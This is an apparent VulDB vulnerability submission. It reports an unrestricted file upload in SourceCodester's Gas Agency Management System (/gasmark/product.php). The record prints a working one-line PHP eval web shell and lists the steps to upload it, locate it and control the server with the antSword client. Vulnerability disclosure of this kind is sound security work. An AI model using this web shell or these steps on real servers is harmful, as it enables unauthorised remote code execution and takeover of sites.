| Title | sourcecodester Gas Agency Management System /gasmark/product.php exists unrestricted upload |
|---|
| Description | File uploading is not filtered, and uploading a sentence is caused by a Trojan horse getshell
upload shell like this
```php
<?php @eval($_POST['shell']);?>
```
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/oneWorld.png
Then we check it
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/Check.png
then we can see it in /gasmark/assets/myimages/oneWord.php
Use antSword to getshell
https://github.com/Drun1baby/CVE_Pentest/blob/main/Gas%20Agency%20Management%20System%20CMS/images/getShell.png
The source code website is https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
|---|
| User | Drunkbaby (UID 30821) |
|---|
| Submit | 2022-08-11 12:52 PM (4 years ago) |
|---|
| Moderation | 2022-08-11 01:44 PM (52 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 206173 [SourceCodester Gas Agency Management System oneWord.php shell privilege escalation] |
|---|
| Points | 20 |
|---|